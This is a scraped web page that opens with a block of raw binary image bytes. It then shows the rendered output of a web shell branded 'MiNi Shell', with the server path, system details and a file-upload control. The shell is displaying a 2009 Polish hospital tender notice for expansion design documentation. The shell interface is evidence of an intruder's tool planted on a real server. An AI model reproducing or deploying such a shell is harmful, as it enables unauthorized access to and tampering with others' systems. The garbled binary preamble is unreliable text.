JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090604/87505-N-2009.html

<p class="kh_header"><b>Nowe Miasto: Opracowanie kompleksowej dokumentacji budowlano- wykonawczej  wraz z wszelkimi uzgodnieniami i uzyskaniem pozwolenia na rozbudowę  szpitala  w Nowym - Mieście n.P - zadanie nr 1  Rozbudowa Izby Przyjęć</b><br>
<b>Numer ogłoszenia: 87505 - 2009; data zamieszczenia: 04.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Tomaszowska 43, 26-420 Nowe Miasto, woj. mazowieckie, tel. 048 6743842, faks 048 6740040.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz-nowemiasto.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompleksowej dokumentacji budowlano- wykonawczej  wraz z wszelkimi uzgodnieniami i uzyskaniem pozwolenia na rozbudowę  szpitala  w Nowym - Mieście n.P - zadanie nr 1  Rozbudowa Izby Przyjęć.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania jest   usługa polegającą na : Opracowaniu kompleksowej dokumentacji budowlano- wykonawczej  wraz z wszelkimi uzgodnieniami i uzyskaniem pozwolenia na rozbudowę  szpitala  w Nowym - Mieście n.P- zadanie nr 1  Rozbudowa Izby Przyjęć o niezbędne pomieszczenia dla doraźnej pomocy i obserwacji chorych z wprowadzeniem do nowego budynku przez dobudowanie budynku C z łącznikami oraz adaptacja pomieszczeń w budynku
północnym po Izbie Przyjęć na część diagnostyczną (RTG ,Tomograf, EKG i USG) .
 1.Do obowiązków  wykonawcy należy:
      a) opracowanie dokumentacji ,
      b)uzyskanie niezbędnych zatwierdzeń i uzgodnień,
      c)uzyskanie prawomocnego pozwolenia na budowę,
      d)nadzór autorski nad wykonaniem robót przewidzianych projektem .
      e)sporządzenie  SIWZ i przeprowadzenie wspólnie z zamawiającym 
         postępowania przetargowego w celu wyłonienia wykonawcy na Rozbudowę 
         Izby Przyjęć szpitala w Nowym -Mieście n/P.
  2.Szczegółowy zakres opracowania dokumentacji projektowo - kosztorysowej 
     przedstawiono w  pkt 2.3.1 Projektu koncepcji modernizacji i rozbudowy 
     istniejącego szpital w Nowym-Mieście n.P  - załączniku nr 6 do SIWZ oraz 
     wstępnego studium wykonalności Rozbudowa Izby Przyjęć szpitala w Nowy-
     Mieście n.P.
   3.Zakres opracowania obejmuje :  
     1)Projekt budowlany wielobranżowy dla budynków  C ,CA 1 i CB 1 oraz 
        budynek A1 parter (diagnostyka)  w składzie:
     - inwentaryzacja budowlana istniejących obiektów - w liczbie 2 egzemplarze w 
       formie pisemnej + jeden egzemplarz w formie elektronicznej ;
     - plan zagospodarowania terenu , 
     - projekt architektoniczno -budowlany
     - projekt konstrukcyjny, 
     - projekt instalacji sanitarnych , 
     - projekt instalacji elektrycznych, 
  2)Projekt wykonawczy wielobranżowy dla budynków:   a)Izby przyjęć C- ławy , 
     fundamenty ,  parter i dach, b)łączniki CA 1 i CB 1- ławy,fundamenty ,parter i 
     dach, c)modernizowany A 1 - parter w obrębie diagnostyki w składzie :
     - plan zagospodarowania terenu , 
     - projekt architektoniczno -budowlany
     - projekt konstrukcyjny, 
     - projekt instalacji sanitarnych , 
     - projekt instalacji elektrycznych, 
     - projekt instalacji wentylacyjno-klimatycznych,
     - projekt instalacji specjalistycznych, 
     - kosztorysy i specyfikacje
     - informację dotyczącą bezpieczeństwa i ochrony zdrowia,
     - oświadczenie Wykonawcy , że dostarczona dokumentacja projektowa jest 
       wykonana zgodnie z  umowa, obowiązującymi przepisami techniczno-
       budowlanymi oraz normami .Wydana jest w stanie pełnym, kompletna z punktu
       widzenia celu któremu ma służyć .
  3)Dokumentacja ta powinna być wykonana zgodnie z Rozporządzeniem Ministra 
     Infrastruktury  z dnia 2 września 2004 r w prawie szczegółowego zakresu i form 
     dokumentacji projektowej,specyfikacji technicznej wykonania i odbioru robót 
     budowlanych oraz programu funkcjonalno-użytkowego (Dz. U .Nr 202 ,poz. 207 
     ze zm.) , kosztorysy inwestorskie zaś zgodnie z Rozporządzeniem Ministra 
     Infrastruktury z dnia 18 maja 2004 r w sprawie metod i podstaw sporządzania 
     kosztorysu inwestorskiego,obliczania planowanych kosztów prac projektowych 
     oraz planowanych kosztów budowlanych określonych w programie funkcjonalno-
     użytkowym (Dz. U. Nr 130 poz.1389) .
  5)Dokumentacja projektowo-kosztorysowa winna być opracowana  w pełnym 
     zakresie ,umożliwiającym późniejszą realizację w oparciu o obowiązujące 
     normy , rozporządzenia oraz spełniać  warunki w nich zawarte:
   5.1)Projekty muszą posiadać wszystkie wymagane prawem budowlanym 
        uzgodnienia.
   5.2)Dodatkowo na etapie  projektowania należy dokonać uzgodnień z 
        przedstawicielem Zamawiającego  w zakresie:
         a)rodzaju urządzeń teletechnicznych: klimatyzacji, sieci telefonicznej z 
            uwzględnieniem istniejącej cyfrowej centrali telefonicznej , sieci 
            komputerowej,  sieci monitoringu medycznego oraz sieci alarmowo- 
            przyzywowej.
         b) doboru urządzeń i wyposażenia pomieszczeń i gabinetów  zabiegowych.
  6)Projekty muszą być wykonane przez projektantów posiadających uprawnienia
     budowlane do projektowania  w odpowiedniej specjalności.
  7)Szczegółowe dane budynku szpitala zamawiający posiada  w  wersji papierowej.
     Dane te będą  udostępnione wykonawcy w siedzibie zamawiającego - po 
     uzgodnieniu terminu z  p. Wasiak Henryk telefon 0486743852.
  8)Wykonawca obowiązany jest przekazać zamawiającemu przedmiot zamówienia 
     zarówno w formie tradycyjnych opracowań papierowych  jak  również w formie 
     elektronicznej, w postaci plików odczytywanych przez powszechne programy 
     określone w Rozporządzeniu Rady Ministrów z dnia 11 października 2005 r w 
     sprawie minimalnych wymagań dla systemów teleinformatycznych.
  9)Zamawiający informuje, iż posiada rezerwy gazów medycznych ,energii cieplnej 
     do nowo powstałego budynku Izby Przyjęć oraz adaptowanych pomieszczeń.
  10)Opracowanie projektu w pełnym zakresie powinna posiadać wymagane decyzje 
     i uzgodnienia ( w tym z  użytkownikiem) niezbędne do otrzymania decyzji 
     pozwolenia na budowę. Wszystkie materiały  do  projektowania jednostka 
     projektująca uzyska we własnym zakresie.
  11)W celu prawidłowego sporządzenia oferty ,wykonawca powinien dokonać wizji 
      lokalnej oraz uzyskać wszystkie niezbędne informacje , co do ryzyka , 
      trudności i wszelkich innych okoliczności jakie mogą wystąpić w trakcie 
      realizacji zamówienia. Koszt wizji lokalnej ponosi  wykonawca..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 180.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Warunkiem udziału w postępowaniu jest wniesienie wadium do dnia 16.06.2009 r
   godz. 9.30. Zamawiający określa wadium na  kwotę 6.500,00 PLN (słownie: 
   sześć tysięcy pięćset złotych).
  2.Wadium może być wniesione w pieniądzu lub  w inny sposób określony w art. 45
     ust.6 ustawy Prawo  zamówień publicznych przed upływem terminu do 
     składania ofert.
  3.Wadium wnoszone w  w pieniądzu  należy wpłacić przelewem na rachunek 
    bankowy w  Banku Spółdzielczego w Belsku Dużym oddział Nowe-Miasto n.P  Nr. 
    48 9116 0001 0001 4616 2000 0002 , z dopiskiem na przelewie Wadium i 
    oznaczyć dokumentacja projektowa na dobudowę Izby Przyjęć w Nowym-
    Mieście n.P.
  4.Jeżeli wadium zostanie wniesione w pieniądzu wykonawca dołącza do oferty 
     kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu, który 
     powinien wpłynąć na konto zamawiającego  przed upływem terminu do 
     składania ofert .W przeciwnym razie wykonawca zostanie wykluczony na 
     podstawie art 24 ust 2 pkt 4) ustawy . Pozostałe formy wniesienia
     wadium określone  w art.45 ust.6 ustawy Prawo zamówień publicznych muszą 
     zachowywać ważność przez cały okres w  którym wykonawca jest związany.
  5.Zamawiający niezwłocznie zwróci wadium wykonawcom na zasadach 
     określonych w art.46  ust. 1 i 2  ustawy Prawo zamówień publicznych. 
     Wykonawca traci wadium nie spełniając  warunków zawartych w art.46 ust.4 a
      i 5 ustawy  Prawo zamówień publicznych.
  6.Wykonawca , który nie zabezpieczy oferty akceptowalną formą wadium w 
     wymaganym terminie zostanie wykluczony z postępowania zgodnie z art.24 ust
     2 pkt 4) ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się wykonawcy będący osobami 
  fizycznymi, osobami prawnymi lub jednostkami organizacyjnymi nie posiadającymi 
  osobowości prawnej, a także wykonawcy ci  występujący wspólnie spełniający 
  warunki określone w art 22 ust 1 , ustawy z dnia 29 stycznia 2004 r oraz 
  Specyfikacji Istotnych Warunków Zamówienia  szczególności : 
     1) posiadają uprawnienia do wykonywania działalności  lub czynności określonej 
        przedmiotem  zamówienia, jeżeli ustawy nakładają posiadania takich 
        uprawnień oraz udokumentują to poprzez wykazanie posiadania  uprawnień 
        do wykonywania działalności związanej z  przedmiotem niniejszego 
        zamówienia publicznego,
     2) posiadają niezbędną wiedzę i doświadczenie i udokumentują to poprzez 
        wykazanie realizacji przynajmniej jednej usługi odpowiadającej swoim 
        rodzajem oraz wartością usługom  stanowiącym przedmiot zamówienia oraz 
        dysponują potencjałem technicznym i osobami zdolnymi do wykonania   
        zamówienia lub przedstawią pisemne zobowiązanie innych   przedmiotów do 
        udostępnienia potencjału technicznego i osób zdolnych do wykonania
         zamówienia w tym 
         - projektantem posiadającym co najmniej 3 letnie doświadczenie w  zakresie 
           dokumentacji projektowej  związanej z rozbudową , przebudową  obiektów
           służby zdrowia  o charakterze szpitalnym posiadającym uprawnienia 
           budowlane do projektowania przynależnym do właściwej Izby Zawodowej;
        - wielobranżowym zespołem projektowym, składającym sie  z osób 
           posiadających odpowiednie uprawnienia budowlane do projektowania bez 
           ograniczeń przynależnych do właściwej Izby Zawodowej w specjalnościach:
          -architektonicznej,
          -konstrukcyjno- budowlanej,
          -teleinformatycznej,
          -instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, 
            wentylacyjnych, wodociągowychi kanalizacyjnych,
         - instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i 
            elektroenergetycznych
        W przypadku ,kiedy wykonawca nie dysponuje na dzień złożenia oferty 
        osobami wymienionymi w ppkt 2) , ale będzie nimi dysponował do wykonania 
        zamówienia ,zobowiązany jest załączyć do oferty pisemne zobowiązanie 
        innych podmiotów do udostępnienia tych osób .
      3)znajdują sie w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
         przedmiotu zamówienia,
      4) nie podlegają wykluczeniu  z postępowania o udzielenie zamówienia oraz 
          udokumentują to poprzez złożenie oświadczeń  potwierdzających, że 
          Wykonawca nie podlega wykluczeniu z postępowania o udzielenie 
          zamówienia publicznego.
        Opis sposobu dokonania oceny spełnienia wymaganych warunków .
      Sprawdzenie wymaganych warunków udziału w postępowaniu odbywać się 
      będzie na podstawie przedłożonych przez Wykonawcę wraz z ofertą 
      dokumentów i oświadczeń  potwierdzających spełnienie   warunków w 
      postępowaniu i wymaganych przez Zamawiającego w pkt.10 niniejszej SIWZ 
      zgodnie z  formułą (spełnia  -  nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wraz ze złożoną ofertą wypełnioną na Formularzu ofertowym należy załączyć: 
    a)Oświadczenie że Wykonawca  spełnienia wymagania wynikające z  art. 22 ust 
      1 ustawy i nie podlega wykluczeniu na podstawie art. 24 ust 1 i  2 ustawy .
2.W celu potwierdzenia posiadania uprawnień  do wykonywania  działalności 
   określonej przedmiotem zmówienia  lub czynności wykonawcy winni złożyć 
   następujące dokumenty :
    a)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  
      ewidencji o  działalności gospodarczej ,jeżeli odrębne  przepisy wymagają 
      wpisu do rejestru lub zgłoszenia do  ewidencji o działalności  gospodarczej   
      wystawione nie wcześniej niż 6 m-cy  przed upływem terminu składania ofert; 
      ( w przypadku konsorcjum ubiegającego się o zamówienia ,każdy z 
      wykonawców jest  zobowiązany złożyć ten dokument).
    b)Aktualne zaświadczenie Urzędu Skarbowego  oraz właściwego oddziału 
      Zakładu Ubezpieczeń  Społecznych lub Kasy Rolniczego Ubezpieczenia 
      Społecznego potwierdzające odpowiednio,że  Wykonawca nie zalega z 
      opłacaniem podatków,opłat oraz składek na ubezpieczenie zdrowotne i  
      społeczne lub zaświadczeń , że uzyskał przewidziane prawem zwolnienie, 
      odroczenie lub  rozłożenie na raty zaległych płatności  lub wstrzymanie w 
      całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 
      miesiące przed terminem do składania ofert (w przypadku konsorcjum 
      ubiegającego się o zamówienia ,każdy z wykonawców jest zobowiązany złożyć 
      ten dokument).
  3.W celu potwierdzenia posiadania uprawnień do wykonywania określonej 
    działalności , lub  czynności objętych przedmiotem zamówienia, jeżeli ustawy 
    nakładają obowiązek posiadania takich uprawnień  do  wykonywania  działalności 
    określonej  przedmiotem  zmówienia składa:
   a)wykaz zawierający imiona i nazwiska osób ,które będą brały udział w pracach 
      projektowych w poszczególnych specjalnościach wraz z ich uprawnieniami 
      budowlanymi określonymi przepisami Prawa budowlanego . Do informacji należy 
      dołączyć kserokopie stosownych uprawnień budowlanych,  potwierdzenie 
      członkostwa z właściwej izby samorządu zawodowego (zaświadczenia) oraz  
      posiadanie wymaganego ubezpieczenia od odpowiedzialności  cywilnej
      aktualnego na dzień składania ofert .Zamawiający dopuszcza jako dokument 
      równoważny,złożenie nieaktualnego zaświadczenia z ww Izby oraz dowodu 
      dowodu dokonania należnych składek ,z którego wynika ,że są one opłacone 
      na dzień składania ofert .  
  4.W celu potwierdzenia ,że wykonawca posiada niezbędną wiedzę oraz 
     doświadczenie,  potencjał techniczny, a także dysponuje osobami zdolnymi do 
     wykonania zamówienia ,   składa :  
     a)wykaz wykonanych , a w przypadku świadczeń okresowych lub ciągłych 
        również wykonanych,usług w okresie trzech lat przed dniem wszczęcia 
        postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności
        jest krótszy - w tym okresie ,odpowiadających swoim rodzajem i wartością 
        usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, 
        przedmiotu, dat wykonania i odbiorców (co najmniej 1 zmówienia na 
        wykonanie dokumentacji  projektowo -kosztorysowej związanej z budową, 
        przebudową  lub remontem budynków o charakterze służby zdrowia, których
        autorami  (autorem) byli członkowie zespołu wykonawcy ubiegającego
       się o wykonanie zamówienia oraz załączenie dokumentów potwierdzających , 
       że usługi zostały wykonane należycie .
  5.W celu potwierdzenia ,że wykonawca  znajduje się w sytuacji ekonomicznej i 
     finansowej zapewniającej  wykonanie zamówienia, składa następujące 
     dokumenty:
   a)oryginał lub kserokopię polisy  lub inny dokument potwierdzający , że 
      wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
      prowadzonej działalności gospodarczej, w tym działalności zgodnej z 
      przedmiotem zamówienia na kwotę 50.000,00 zł ważną na dzień składania 
      ofert ; 
  6.Dokument potwierdzający uprawnienie osoby do występowania w imieniu 
     Wykonawcy (np. pełnomocnictwo do reprezentowania o ile ofertę składa 
     pełnomocnik, uchwałę wspólników spółki,konsorcjum) o ile wynika to z 
     załączonych dokumentów.
  7.Oświadczenie Wykonawcy , że dostarczona dokumentacja projektowa jest 
     wykonana zgodnie z umowa, obowiązującymi przepisami techniczno-
     budowlanymi oraz normami .Wydana jest w stanie pełnym, kompletna z punktu 
     widzenia celu któremu ma służyć .
   8.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
      Rzeczpospolitej Polskiej,stosuje się przepisy określone w § 2 Rozporządzenia 
      Prezesa Rady Ministrów z dnia 19 maja 2006 r w sprawie rodzaju dokumentów, 
      jakie może żądać zamawiający od wykonawcy oraz form, w  jakich te 
      dokumenty mogą być składane . Wykonawca składa dokument lub dokumenty 
      wystawione w kraju w którym ma siedzibę lub miejsce zamieszkania 
      potwierdzające że:
      a)nie otwarto jego likwidacji ani nie ogłoszono jego upadłości;
      b)nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie 
         społeczne lub zdrowotne  albo że uzyskał przewidziane prawem zwolnienie, 
         odroczenie lub rozłożenie na raty zaległych  płatności  lub wstrzymanie w  
         całości wykonania decyzji właściwego organu;
      c)nie  orzeczono wobec niego zakazu ubiegania się o zamówień.
  9.Dokumenty ,o których mowa w pkt.8. lit. a i c  powinny być wystawione nie 
     wcześniej niż 6 miesięcy  przed upływem terminu składania wniosków o 
     dopuszczenie do udziału o udzielenie zamówienia albo składania ofert . 
     Dokumenty ,o których mowa w w pkt.8. lit.b powinien być wystawiony nie 
     wcześniej  niż 3 miesiące przed upływem terminu  do składania wniosków
     o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo 
      składania ofert.
  10.Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę
       lub miejsce   zamieszkania nie wydaje się dokumentów, o których mowa w 
       pkt.8. zastępuje się je dokumentem zawierającym    oświadczenie złożone 
       przed notariuszem ,właściwym organem sadowym, administracyjnym albo 
       organem samorządu zawodowego lub gospodarczego odpowiednio do kraju 
       pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę  lub  miejsce 
       zamieszkania. 
  11.Dokumenty, są składane w formie  oryginału, wypisu , odpisu lub kopii w 
      języku  polskim lub przetłumaczone na język polski, stosownie do 
      obowiązujących przepisów.
  12.Kserokopie dokumentów powinny być czytelne i potwierdzone za zgodność z 
      oryginałem przez wykonawcę lub osoby (ę) uprawnione (ą) do składania 
      oświadczeń woli w imieniu wykonawcy.
  13.W przypadku wykonawców działających wspólnie(konsorcjum) ,dokumenty 
      muszą być złożone przez każdego z członków konsorcjum..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zoz-nowemiasto.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej ul. Tomaszowska 43 26-420 Nowe-Miasto n/P po wpłaceniu na konto w Banku Spółdzielczym  Belsk Duży na k-to 
75 9116 0001 0001 4616 2000 0001 kwotę 50 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2009 godzina 09:30, miejsce: SP ZOZ Nowe-Miasto ul. Tomaszowska 43 26-420 Nowe-Miasto n/P budynek administracyjny -sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com